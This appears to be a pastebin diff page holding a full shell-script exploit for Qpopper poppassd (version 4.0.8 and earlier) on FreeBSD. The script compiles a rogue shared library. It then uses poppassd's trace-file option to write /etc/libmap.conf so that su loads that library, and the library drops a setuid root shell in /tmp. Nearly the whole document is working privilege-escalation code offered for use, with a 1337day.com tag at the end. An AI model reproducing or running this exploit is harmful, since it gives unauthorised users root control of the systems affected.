View difference between Paste ID: <a href="/FbYjXJic">FbYjXJic</a> and <a href="/cPqW03yn">cPqW03yn</a>

========================================================
1		========================================================
2		Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd)
3		========================================================
4
5
6		#!/bin/sh
7		###########################################################################
8		# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ###
9		# tested on FreeBSD 5.4-RELEASE ###
10		###########################################################################
11
12		POPPASSD_PATH=/usr/local/bin/poppassd
13		HOOKLIB=libutil.so.4
14
15		echo ""
16		echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
17		echo ""
18		sleep 2
19		umask 0000
20		if [ -f /etc/libmap.conf ]; then
21		echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
22		exit
23		fi
24		cat > program.c << _EOF
25		#include <unistd.h>
26		#include <stdio.h>
27		#include <sys/types.h>
28		#include <stdlib.h>
29
30		void _init()
31		{
32		if (!geteuid()) {
33		remove("/etc/libmap.conf");
34		execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
35		}
36		}
37
38		_EOF
39		gcc -o program.o -c program.c -fPIC
40		gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
41		cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
42		echo "--- Now type ENTER ---"
43		echo ""
44		$POPPASSD_PATH -t /etc/libmap.conf
45		echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
46		su
47		if [ -f /tmp/xxxx ]; then
48		echo "IT'S A ROOTSHELL!!!"
49		/tmp/xxxx
50		else
51		echo "Sorry, exploit failed."
52		fi
53
54
55
56		# 056FE58749E5C4AA 1337day.com [2014-09-08] 3CFC11BFC696FCE0 #